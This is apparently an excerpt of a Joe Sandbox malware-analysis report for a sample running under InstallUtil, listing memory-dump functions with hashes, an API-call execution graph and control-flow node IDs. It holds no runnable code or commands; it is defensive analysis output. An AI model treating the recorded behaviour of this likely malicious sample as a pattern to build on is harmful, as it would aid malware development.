                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c9359c8c0360be6e0ac31fdb7b94357f3dcb039df12224f52d23b9b756e998d1
                                                                                                  • Instruction ID: cd2956fa31478a137bddba7df210d5f4fa11e63c8e216f08b4e52582eac75b18
                                                                                                  • Opcode Fuzzy Hash: c9359c8c0360be6e0ac31fdb7b94357f3dcb039df12224f52d23b9b756e998d1
                                                                                                  • Instruction Fuzzy Hash: A031E3B0E01218DFDB18DFAAC844BAABBB6FB89300F10D0A9D809A7315DB315A45CF40
                                                                                                  Function 056FB4ED Relevance: .1, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0a75bb94c9bd2c93b5353cce9b6541d56f8411fc5f8893b942d2450cd0a418e4
                                                                                                  • Instruction ID: bc6db9944e6dfcf60552b72cf61c059cd93561ea1f511b099adaf4aee1a5e84a
                                                                                                  • Opcode Fuzzy Hash: 0a75bb94c9bd2c93b5353cce9b6541d56f8411fc5f8893b942d2450cd0a418e4
                                                                                                  • Instruction Fuzzy Hash: 3D213E71D157488BEB19CF6BC8056DEBFF6AF89304F14C0AAC418A7265DA744946CF60
                                                                                                  Function 026C81F0 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9cd309757f2d597f820e08c3c28b1b50aa33e54ce00813c28b7d9625e5587761
                                                                                                  • Instruction ID: c79ee845c70deede8dd0ae9a54137e8fa42a36885cd17ec1b233691d7b122594
                                                                                                  • Opcode Fuzzy Hash: 9cd309757f2d597f820e08c3c28b1b50aa33e54ce00813c28b7d9625e5587761
                                                                                                  • Instruction Fuzzy Hash: 8231B9B1D006588BEB28CF6BD84939EFBF3AFC8304F14C1A9C448AA254DB740A85CF41
                                                                                                  Function 06317ED8 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 33cee1500fee74993781ffecec47a1ebd93c05f42c5a0edc6810d141ce67c5e0
                                                                                                  • Instruction ID: 758196fb13e0b3710af8ad3d71f0e7988df7cf85ad63af22fdb1eca26ce07af6
                                                                                                  • Opcode Fuzzy Hash: 33cee1500fee74993781ffecec47a1ebd93c05f42c5a0edc6810d141ce67c5e0
                                                                                                  • Instruction Fuzzy Hash: 6B21C971D056588BEB58CF6BC9446CAFBF7AFC8300F18C4BAD448AA214EA714986CE50
                                                                                                  Function 026C81F8 Relevance: .1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: faca0b3784cdc2c7015db4fcb8541152561f61d2f68b86c0400711c5109dc9ac
                                                                                                  • Instruction ID: d4391ff86bef4d742114a98b5340720c5a7e35a84dc93625289c8895dce814ad
                                                                                                  • Opcode Fuzzy Hash: faca0b3784cdc2c7015db4fcb8541152561f61d2f68b86c0400711c5109dc9ac
                                                                                                  • Instruction Fuzzy Hash: 3021A9B1D016588BEB68CF6BD94879EFBF7AFC8304F14C1A9C448A6254DB740A85CF40
                                                                                                  Function 06317061 Relevance: .1, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fbbbaede176d811d10ccbceda7143ba58a50ce5ff7c8767288115bd8e7db21bc
                                                                                                  • Instruction ID: 08b51fcfb75103c1545ec40d419b0721d6bf8db9c141b99400e169c2f34171e4
                                                                                                  • Opcode Fuzzy Hash: fbbbaede176d811d10ccbceda7143ba58a50ce5ff7c8767288115bd8e7db21bc
                                                                                                  • Instruction Fuzzy Hash: 15110771D146188BEB58CF6B884069EBBF7AFC9300F18C56AC418AB255DA310A458F91
                                                                                                  Function 06315E65 Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4da77b898f2a7930de1b5452c661943e3717d260d29da285c8b0b9296755d2ec
                                                                                                  • Instruction ID: 48b2e2df0e68cff22507165e7bae63586122274c7c49b5734b132df56825a068
                                                                                                  • Opcode Fuzzy Hash: 4da77b898f2a7930de1b5452c661943e3717d260d29da285c8b0b9296755d2ec
                                                                                                  • Instruction Fuzzy Hash: 8801E4764162529FC7698F71C806493BFF9EF66324335986CE8D6DA431E3311A81CBE0
                                                                                                  Function 0631C116 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$7$;$>
                                                                                                  • API String ID: 0-3090293990
                                                                                                  • Opcode ID: cfffe563cd0731b1992805b0cdb9020414f0fc5efeffe8c6050ade3fa5a3a737
                                                                                                  • Instruction ID: d99a42b9c8685c5f9caa30a91f597557f0b3c649157efc8d52a497dcf72af956
                                                                                                  • Opcode Fuzzy Hash: cfffe563cd0731b1992805b0cdb9020414f0fc5efeffe8c6050ade3fa5a3a737
                                                                                                  • Instruction Fuzzy Hash: E611F3B4901208CFEB94CFA4C585B9DBBF5FB08358F146499D00AAB798D7B89984CF94
                                                                                                  Function 0631BDAA Relevance: 5.0, Strings: 4, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$9$>$B
                                                                                                  • API String ID: 0-1484416379
                                                                                                  • Opcode ID: 77098451f5f5e1a9f0587a6564d4c152e60641803d89c2771d2fa741169dffa9
                                                                                                  • Instruction ID: 28c2dd3a26bd1ab2fe5dc60aa7b2309834567f31917067f1e88c80ae34151e89
                                                                                                  • Opcode Fuzzy Hash: 77098451f5f5e1a9f0587a6564d4c152e60641803d89c2771d2fa741169dffa9
                                                                                                  • Instruction Fuzzy Hash: 0211F574D01108CFEB94CFA8D185B98BBF4FB09318F546495D10AABB95C3B89984CF94
                                                                                                  Function 0631BD6E Relevance: 5.0, Strings: 4, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #$%$1$>
                                                                                                  • API String ID: 0-3428143336
                                                                                                  • Opcode ID: 76452c463db57420ac4beaedb2b53f5ab7fa5d126522e02c8dbad3cc18d9cfa9
                                                                                                  • Instruction ID: cabb4ccb783bdac03c56373d75d0c368f38cdeaa428cb142cfc0e1f141e80783
                                                                                                  • Opcode Fuzzy Hash: 76452c463db57420ac4beaedb2b53f5ab7fa5d126522e02c8dbad3cc18d9cfa9
                                                                                                  • Instruction Fuzzy Hash: BB11B0B4901208CFEB94CF68D1C5B98BBB4EB09328F146495E009AB795D3B89984CF98

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:10.6%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:185
                                                                                                  Total number of Limit Nodes:19
                                                                                                  execution_graph 39868 65c3050 DuplicateHandle 39869 65c30e6 39868->39869 39870 65cd4f0 39871 65cd558 CreateWindowExW 39870->39871 39873 65cd614 39871->39873 39874 2940848 39876 294084e 39874->39876 39875 294091b 39876->39875 39881 65c1cf0 39876->39881 39885 65c1d00 39876->39885 39889 65c1d83 39876->39889 39895 2941382 39876->39895 39882 65c1d0f 39881->39882 39899 65c1464 39882->39899 39886 65c1d0f 39885->39886 39887 65c1464 3 API calls 39886->39887 39888 65c1d30 39887->39888 39888->39876 39890 65c1cef 39889->39890 39894 65c1d8a 39889->39894 39891 65c1d57 39890->39891 39892 65c1464 3 API calls 39890->39892 39891->39876 39893 65c1d30 39892->39893 39893->39876 39894->39876 39897 294138b 39895->39897 39896 2941480 39896->39876 39897->39896 40019 2947ea0 39897->40019 39900 65c146f 39899->39900 39903 65c2bcc 39900->39903 39902 65c36b6 39902->39902 39904 65c2bd7 39903->39904 39905 65c3ddc 39904->39905 39908 65c5a68 39904->39908 39912 65c5a63 39904->39912 39905->39902 39909 65c5a89 39908->39909 39910 65c5aad 39909->39910 39916 65c5c18 39909->39916 39910->39905 39914 65c5a68 39912->39914 39913 65c5aad 39913->39905 39914->39913 39915 65c5c18 3 API calls 39914->39915 39915->39913 39917 65c5c25 39916->39917 39918 65c5c5e 39917->39918 39920 65c4e28 39917->39920 39918->39910 39921 65c4e33 39920->39921 39923 65c5cd0 39921->39923 39924 65c4e5c 39921->39924 39923->39923 39925 65c4e67 39924->39925 39931 65c4e6c 39925->39931 39927 65c5d3f 39935 65cb050 39927->39935 39944 65cb038 39927->39944 39928 65c5d79 39928->39923 39932 65c4e77 39931->39932 39933 65c6fc8 39932->39933 39934 65c5a68 3 API calls 39932->39934 39933->39927 39934->39933 39937 65cb081 39935->39937 39939 65cb181 39935->39939 39936 65cb08d 39936->39928 39937->39936 39953 65cb2c8 39937->39953 39957 65cb2b8 39937->39957 39938 65cb0cd 39962 65cc5c8 39938->39962 39972 65cc5b9 39938->39972 39939->39928 39946 65cb081 39944->39946 39947 65cb181 39944->39947 39945 65cb08d 39945->39928 39946->39945 39949 65cb2c8 3 API calls 39946->39949 39950 65cb2b8 3 API calls 39946->39950 39947->39928 39948 65cb0cd 39951 65cc5c8 GetModuleHandleW 39948->39951 39952 65cc5b9 GetModuleHandleW 39948->39952 39949->39948 39950->39948 39951->39947 39952->39947 39982 65cb318 39953->39982 39991 65cb308 39953->39991 39954 65cb2d2 39954->39938 39958 65cb2c8 39957->39958 39960 65cb318 2 API calls 39958->39960 39961 65cb308 2 API calls 39958->39961 39959 65cb2d2 39959->39938 39960->39959 39961->39959 39963 65cc5f3 39962->39963 40000 65ca37c 39963->40000 39966 65cc676 39968 65cc6a2 39966->39968 40015 65ca2ac 39966->40015 39969 65ca37c GetModuleHandleW 39969->39966 39973 65cc5f3 39972->39973 39974 65ca37c GetModuleHandleW 39973->39974 39975 65cc65a 39974->39975 39979 65ca37c GetModuleHandleW 39975->39979 39980 65cca78 GetModuleHandleW 39975->39980 39981 65ccb20 GetModuleHandleW 39975->39981 39976 65cc676 39977 65ca2ac GetModuleHandleW 39976->39977 39978 65cc6a2 39976->39978 39977->39978 39979->39976 39980->39976 39981->39976 39983 65cb329 39982->39983 39987 65cb34c 39982->39987 39984 65ca2ac GetModuleHandleW 39983->39984 39985 65cb334 39984->39985 39985->39987 39990 65cb5a3 GetModuleHandleW 39985->39990 39986 65cb344 39986->39987 39988 65cb550 GetModuleHandleW 39986->39988 39987->39954 39989 65cb57d 39988->39989 39989->39954 39990->39986 39992 65cb30d 39991->39992 39993 65ca2ac GetModuleHandleW 39992->39993 39995 65cb34c 39992->39995 39994 65cb334 39993->39994 39994->39995 39999 65cb5a3 GetModuleHandleW 39994->39999 39995->39954 39996 65cb344 39996->39995 39997 65cb550 GetModuleHandleW 39996->39997 39998 65cb57d 39997->39998 39998->39954 39999->39996 40001 65ca387 40000->40001 40002 65cc65a 40001->40002 40003 65ccc90 GetModuleHandleW 40001->40003 40004 65ccc80 GetModuleHandleW 40001->40004 40002->39969 40005 65cca78 40002->40005 40010 65ccb20 40002->40010 40003->40002 40004->40002 40006 65cca88 40005->40006 40007 65cca93 40006->40007 40008 65ccc90 GetModuleHandleW 40006->40008 40009 65ccc80 GetModuleHandleW 40006->40009 40007->39966 40008->40007 40009->40007 40011 65ccb4d 40010->40011 40012 65ccbce 40011->40012 40013 65ccc90 GetModuleHandleW 40011->40013 40014 65ccc80 GetModuleHandleW 40011->40014 40013->40012 40014->40012 40016 65cb508 GetModuleHandleW 40015->40016 40018 65cb57d 40016->40018 40018->39968 40020 2947eaa 40019->40020 40021 2947ec4 40020->40021 40024 65dfaa9 40020->40024 40028 65dfab8 40020->40028 40021->39897 40025 65dfacd 40024->40025 40026 65dfce2 40025->40026 40027 65dfcf7 GlobalMemoryStatusEx 40025->40027 40026->40021 40027->40025 40030 65dfacd 40028->40030 40029 65dfce2 40029->40021 40030->40029 40031 65dfcf7 GlobalMemoryStatusEx 40030->40031 40031->40030 40032 28fd030 40033 28fd048 40032->40033 40034 28fd0a2 40033->40034 40039 65ca48c 40033->40039 40048 65cd697 40033->40048 40052 65ce7f8 40033->40052 40061 65cd6a8 40033->40061 40040 65ca497 40039->40040 40041 65ce869 40040->40041 40043 65ce859 40040->40043 40044 65ce867 40041->40044 40081 65ce46c 40041->40081 40065 65cea5c 40043->40065 40071 65ce980 40043->40071 40076 65ce990 40043->40076 40044->40044 40049 65cd6a5 40048->40049 40050 65ca48c CallWindowProcW 40049->40050 40051 65cd6ef 40050->40051 40051->40034 40055 65ce835 40052->40055 40053 65ce869 40054 65ce46c CallWindowProcW 40053->40054 40057 65ce867 40053->40057 40054->40057 40055->40053 40056 65ce859 40055->40056 40058 65cea5c CallWindowProcW 40056->40058 40059 65ce990 CallWindowProcW 40056->40059 40060 65ce980 CallWindowProcW 40056->40060 40057->40057 40058->40057 40059->40057 40060->40057 40062 65cd6ce 40061->40062 40063 65ca48c CallWindowProcW 40062->40063 40064 65cd6ef 40063->40064 40064->40034 40066 65cea1a 40065->40066 40067 65cea6a 40065->40067 40085 65cea48 40066->40085 40088 65cea38 40066->40088 40068 65cea30 40068->40044 40073 65ce991 40071->40073 40072 65cea30 40072->40044 40074 65cea48 CallWindowProcW 40073->40074 40075 65cea38 CallWindowProcW 40073->40075 40074->40072 40075->40072 40078 65ce9a4 40076->40078 40077 65cea30 40077->40044 40079 65cea48 CallWindowProcW 40078->40079 40080 65cea38 CallWindowProcW 40078->40080 40079->40077 40080->40077 40082 65ce477 40081->40082 40083 65cfcca CallWindowProcW 40082->40083 40084 65cfc79 40082->40084 40083->40084 40084->40044 40086 65cea59 40085->40086 40092 65cfc00 40085->40092 40086->40068 40089 65cea48 40088->40089 40090 65cea59 40089->40090 40091 65cfc00 CallWindowProcW 40089->40091 40090->40068 40091->40090 40093 65ce46c CallWindowProcW 40092->40093 40094 65cfc1a 40093->40094 40094->40086

                                                                                                  Executed Functions

                                                                                                  Function 065D2418 Relevance: 1.5, Instructions: 1491COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b793df3191d25dae3b8a7005721fe413b7919396459071fc4ac0c487c31a8df4
                                                                                                  • Instruction ID: e124b1038399609090e9b9c1bb6e5a8190cadbd5329c0d79f6ced96745c76d99
                                                                                                  • Opcode Fuzzy Hash: b793df3191d25dae3b8a7005721fe413b7919396459071fc4ac0c487c31a8df4
                                                                                                  • Instruction Fuzzy Hash: 1AD23930E10205CFDB64DB68C584AADB7B2FF89314F54C5A9D449AB2A5EB70ED81CF81
                                                                                                  Function 065D6668 Relevance: .8, Instructions: 825COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 62c1a0ce5caaadc8b6eb799482b523d493c8f867ef29284f6900d433921f4d81
                                                                                                  • Instruction ID: 1b770c23682eb72302dc5d46f3c9ed2cd6594c924bf4a1b1f4cb27c3a9eb18d4
                                                                                                  • Opcode Fuzzy Hash: 62c1a0ce5caaadc8b6eb799482b523d493c8f867ef29284f6900d433921f4d81
                                                                                                  • Instruction Fuzzy Hash: 3B625B34A002059FDB64DB6CD594BADBBF2FB88354F248569E406EB394DB35EC42CB90
                                                                                                  Function 065DB2B0 Relevance: .8, Instructions: 771COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8d62d852abf70ca2a7f5e9bf934e13ae530269f9441bda92a8b1f7cdc3c56a0
                                                                                                  • Instruction ID: 2d100322c6368cf08d4f0630aa1a049f327fdb1957eec721105cf6b4ae974996
                                                                                                  • Opcode Fuzzy Hash: d8d62d852abf70ca2a7f5e9bf934e13ae530269f9441bda92a8b1f7cdc3c56a0
                                                                                                  • Instruction Fuzzy Hash: 7B526AB0E0120A9BEF74DBACD4907ADB7B2FB85310F21852AE405EB395DA75DC41CB91
                                                                                                  Function 065DC200 Relevance: .7, Instructions: 656COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9f6ee7c98615e5d89660d8cc294cfdbba7a2aed2af2cea94d221b7a7f128d421
                                                                                                  • Instruction ID: dd2dac24f60596a48dfb2fce85980900c6be74499c8ceadf08aaa892db25e922
                                                                                                  • Opcode Fuzzy Hash: 9f6ee7c98615e5d89660d8cc294cfdbba7a2aed2af2cea94d221b7a7f128d421
                                                                                                  • Instruction Fuzzy Hash: E0325F34A102059FDF65DBACD980BADBBB6FB89314F108529E505EB385DB35EC42CB90
                                                                                                  Function 065D5640 Relevance: .6, Instructions: 597COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c995db3e6c62dfd0be11ecb10a64482feb8172eeb98c9095270e1558408a9611
                                                                                                  • Instruction ID: 972b8f7247bed239d4ad32cf26eb8cbc9e0d903c07d5a6cfb71911c2cdaf948d
                                                                                                  • Opcode Fuzzy Hash: c995db3e6c62dfd0be11ecb10a64482feb8172eeb98c9095270e1558408a9611
                                                                                                  • Instruction Fuzzy Hash: 5112B171F002559BDF74DB68D8807AEBBB6FB85314F248429E856DB385EA34EC41CB90
                                                                                                  Function 065D7DF0 Relevance: .5, Instructions: 489COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624325830.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65d0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de72499e528c82f8607885bf76fcd2a1cd06ac0a78ba3685a90eafffd8ee435a
                                                                                                  • Instruction ID: 25b36265a202474e8a063a7e1c57bab78fcae465ac861c59cf4d2e3671d3f7a2
                                                                                                  • Opcode Fuzzy Hash: de72499e528c82f8607885bf76fcd2a1cd06ac0a78ba3685a90eafffd8ee435a
                                                                                                  • Instruction Fuzzy Hash: 8802AF30B012069FDB64DB69D894BAEB7F6FF84304F248929D4169B384DB75EC46CB90
                                                                                                  Function 065CB318 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 511 65cb318-65cb327 512 65cb329-65cb336 call 65ca2ac 511->512 513 65cb353-65cb357 511->513 520 65cb34c 512->520 521 65cb338-65cb346 call 65cb5a3 512->521 515 65cb359-65cb363 513->515 516 65cb36b-65cb3ac 513->516 515->516 522 65cb3ae-65cb3b6 516->522 523 65cb3b9-65cb3c7 516->523 520->513 521->520 529 65cb488-65cb548 521->529 522->523 524 65cb3c9-65cb3ce 523->524 525 65cb3eb-65cb3ed 523->525 527 65cb3d9 524->527 528 65cb3d0-65cb3d7 call 65ca2b8 524->528 530 65cb3f0-65cb3f7 525->530 534 65cb3db-65cb3e9 527->534 528->534 562 65cb54a-65cb54d 529->562 563 65cb550-65cb57b GetModuleHandleW 529->563 531 65cb3f9-65cb401 530->531 532 65cb404-65cb40b 530->532 531->532 535 65cb40d-65cb415 532->535 536 65cb418-65cb421 call 65c3934 532->536 534->530 535->536 542 65cb42e-65cb433 536->542 543 65cb423-65cb42b 536->543 544 65cb435-65cb43c 542->544 545 65cb451-65cb45e 542->545 543->542 544->545 547 65cb43e-65cb44e call 65c8af8 call 65ca2c8 544->547 551 65cb460-65cb47e 545->551 552 65cb481-65cb487 545->552 547->545 551->552 562->563 564 65cb57d-65cb583 563->564 565 65cb584-65cb598 563->565 564->565
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 4139908857-0
                                                                                                  • Opcode ID: efb98aa656c4737e2ec746c0b97e26450e8eb0a6fa264765b6f5c90a2fdeb997
                                                                                                  • Instruction ID: 87221bd43612ea4ec63a47bd1a540f4858788268714171ef8a59caacf1184f82
                                                                                                  • Opcode Fuzzy Hash: efb98aa656c4737e2ec746c0b97e26450e8eb0a6fa264765b6f5c90a2fdeb997
                                                                                                  • Instruction Fuzzy Hash: B0712370A00B058FD7A4DFAAD48575ABBF1FF88610F008A2DD49AD7A40DB75E845CF91
                                                                                                  Function 0294E998 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 671 294e998-294e9b3 673 294e9b5-294e9dc 671->673 674 294e9dd-294e9fc call 294e1f4 671->674 679 294ea02-294ea46 674->679 680 294e9fe-294ea01 674->680 685 294ea4d-294ea61 679->685 686 294ea48-294ea4b 679->686 689 294ea67-294ea7e 685->689 690 294ea63-294ea66 685->690 686->685 692 294ea85-294eaf4 GlobalMemoryStatusEx 689->692 693 294ea80-294ea84 689->693 695 294eaf6-294eafc 692->695 696 294eafd-294eb25 692->696 693->692 695->696
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4610403247.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2940000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3cd81ec0bf30a79347bef1dde368dce2b55eee1ce18d103911f019ac7c479272
                                                                                                  • Instruction ID: dc2ef77fc349360d4ae63459fb260d74795c75c8c9c7511652ee7a522ff35105
                                                                                                  • Opcode Fuzzy Hash: 3cd81ec0bf30a79347bef1dde368dce2b55eee1ce18d103911f019ac7c479272
                                                                                                  • Instruction Fuzzy Hash: BC412371E083999FCB14DFB9D8046AEBBF5BFC9210F1485ABD444A7241DB749840CBE1
                                                                                                  Function 065CD4E4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 699 65cd4e4-65cd556 701 65cd558-65cd55e 699->701 702 65cd561-65cd568 699->702 701->702 703 65cd56a-65cd570 702->703 704 65cd573-65cd5ab 702->704 703->704 705 65cd5b3-65cd612 CreateWindowExW 704->705 706 65cd61b-65cd653 705->706 707 65cd614-65cd61a 705->707 711 65cd655-65cd658 706->711 712 65cd660 706->712 707->706 711->712 713 65cd661 712->713 713->713
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065CD602
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4624162582.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_65c0000_InstallUtil.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 716092398-0
                                                                                                  • Opcode ID: fe7c6d2488efac5d389d1ea356e17b69cba7b45ed236ecc831106823a714c6f9
                                                                                                  • Instruction ID: 153f1c454eb74187bb2aac731696c92113cd0604fa3d5ff1eed29e73f2db537e
                                                                                                  • Opcode Fuzzy Hash: fe7c6d2488efac5d389d1ea356e17b69cba7b45ed236ecc831106823a714c6f9
                                                                                                  • Instruction Fuzzy Hash: 4151AFB1D003499FDB14CF99D884ADEBBB5BF48314F24862EE819AB210D775A885CF90
                                                                                                  Function 065CD4F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
